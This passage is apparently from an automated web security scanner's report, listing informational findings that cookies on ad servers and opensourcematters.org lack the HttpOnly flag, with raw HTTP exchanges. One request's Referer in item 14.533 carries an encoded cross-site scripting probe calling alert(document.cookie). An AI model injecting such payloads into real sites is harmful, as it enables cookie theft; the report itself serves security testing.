Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.518. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.519. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.520. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:26:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.521. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:32:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.522. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.523. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.524. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.525. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:20:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

14.526. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.527. http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc17c.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc17c.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:37:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3078
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<a href="http://www.anrdoezrs.net/p979p-85-7NRVUUUSVNPOSUXTWU" target="_blank" onmouseover="window.status=');
document.write
...[SNIP]...

14.528. http://opensourcematters.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensourcematters.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 1f72ba4da1bac63277a9607bcca06e80=5576152988b79363ffc0a34c946e44b9; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=5576152988b79363ffc0a34c946e44b9; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.529. http://opensourcematters.org/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensourcematters.org
Path:   /contact.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 1f72ba4da1bac63277a9607bcca06e80=d2d8c73a1667c7bf1a7b8a5be9bb382a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.html HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=d2d8c73a1667c7bf1a7b8a5be9bb382a; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 7725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.530. http://opensourcematters.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensourcematters.org
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 1f72ba4da1bac63277a9607bcca06e80=78e39bdbad81bd41991ff68e380b3c74; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=78e39bdbad81bd41991ff68e380b3c74; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.531. http://opensourcematters.org/register-your-group.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensourcematters.org
Path:   /register-your-group.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 1f72ba4da1bac63277a9607bcca06e80=8003f7552ba6924d0dd091b0cd1df613; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /register-your-group.html HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Component not found
Date: Mon, 24 Jan 2011 22:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=8003f7552ba6924d0dd091b0cd1df613; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.532. http://opensourcematters.org/support-joomla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensourcematters.org
Path:   /support-joomla.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 1f72ba4da1bac63277a9607bcca06e80=24aa78d1150500c038af95a02f90a621; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support-joomla.html HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=24aa78d1150500c038af95a02f90a621; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 207691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.533. http://pc3.yumenetworks.com/dynamic_btx/118_12345

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pc3.yumenetworks.com
Path:   /dynamic_btx/118_12345

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ymbt=0rO0ABXcQAAAAAQAAAHYAAARgAAAAAA**; Domain=.yumenetworks.com; Expires=Sat, 26-Mar-2011 02:19:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynamic_btx/118_12345 HTTP/1.1
Host: pc3.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:11 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
YmBtHdr: @BT118_1_0
Set-Cookie: ymbt=0rO0ABXcQAAAAAQAAAHYAAARgAAAAAA**; Domain=.yumenetworks.com; Expires=Sat, 26-Mar-2011 02:19:11 GMT; Path=/
